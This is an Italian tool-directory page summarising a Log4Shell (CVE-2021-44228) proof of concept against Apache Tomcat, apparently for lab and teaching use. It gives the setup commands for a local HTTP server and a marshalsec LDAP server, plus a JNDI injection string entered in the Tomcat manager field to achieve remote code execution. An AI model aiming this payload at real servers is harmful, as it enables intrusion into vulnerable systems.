Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
apache-tomcat-log4j — Log4j2 CVE-2021-44228 Vulnerabilità POC in Apache Tomcat | Kitploit
Strumenti/GitHubGitHub/many-fac3d-g0d/apache-tomcat-log4j
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmany-fac3d-g0d/apache-tomcat-log4j

apache-tomcat-log4j

Log4j2 CVE-2021-44228 Vulnerabilità POC in Apache Tomcat

Vedi Repository
54 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4j2 CVE-2021-44228 Vulnerabilità POC in Apache Tomcat

Anteprima

GIF

Configurazione

Avviare il server tomcat

root@kitploit:~
git clone
cd apache-tomcat-10.0.14/bin
startup.bat

Servire la classe exploit

root@kitploit:~
cd exploit
py -m http.server 8888
root@kitploit:~
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Attacco

Inserire ${jndi:ldap://127.0.0.1:1389/Exploit} nel campo 'Percorso del file di configurazione XML' all'interno dell'app manager http://localhost:8080/manager/html

La classe Exploit viene caricata e viene eseguito RCE (verrà aperta l'app Calcolatrice)

Disclaimer

Il repo è solo un POC realizzato a scopo educativo. Il proprietario del repo non è responsabile per eventuali danni. Come nota morale, non siate malvagi.

Riferimenti

Exploit LDAP https://github.com/mbechler/marshalsec

Scarica lo strumento